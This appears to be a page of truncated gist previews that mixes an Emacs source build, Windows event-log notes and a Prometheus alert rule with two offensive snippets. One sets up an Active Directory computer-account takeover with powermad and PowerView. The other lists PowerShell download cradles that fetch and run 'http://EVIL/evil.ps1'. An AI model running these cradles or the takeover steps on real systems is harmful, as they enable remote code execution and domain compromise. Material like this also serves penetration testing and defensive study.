This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Setting up Emacs in our source directory | |
| mkdir -p ~/src && cd ~/src | |
| git clone --depth 1 --branch emacs-30 git://git.savannah.gnu.org/emacs.git | |
| cd emacs && git checkout emacs-30 | |
| # Enable source package repositories (deb-src) and update apt cache | |
| # for Ubuntu >= 24.04 | |
| sudo sed -i 's/^Types: deb$/Types: deb deb-src/' /etc/apt/sources.list.d/ubuntu.sources && sudo apt update |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
| # PS : ChatGPT makes mistakes, consider "trust but verify" principle | |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
| #Events to Monitor | |
| https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor | |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
| #run | |
| eventvwr.msc Event viewer | |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
| Event Viewer(Local)-Windows Logs (shutdown / restart ) |
| groups: | |
|   - name: node_exporter_alerts | |
|     rules: | |
|       - alert: Node down | |
|         expr: up{job="monitoring-pi"} == 0 | |
|         for: 2m | |
|         labels: | |
|           severity: warning | |
|         annotations: | |
|           title: Node {{ $labels.instance }} is down |
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |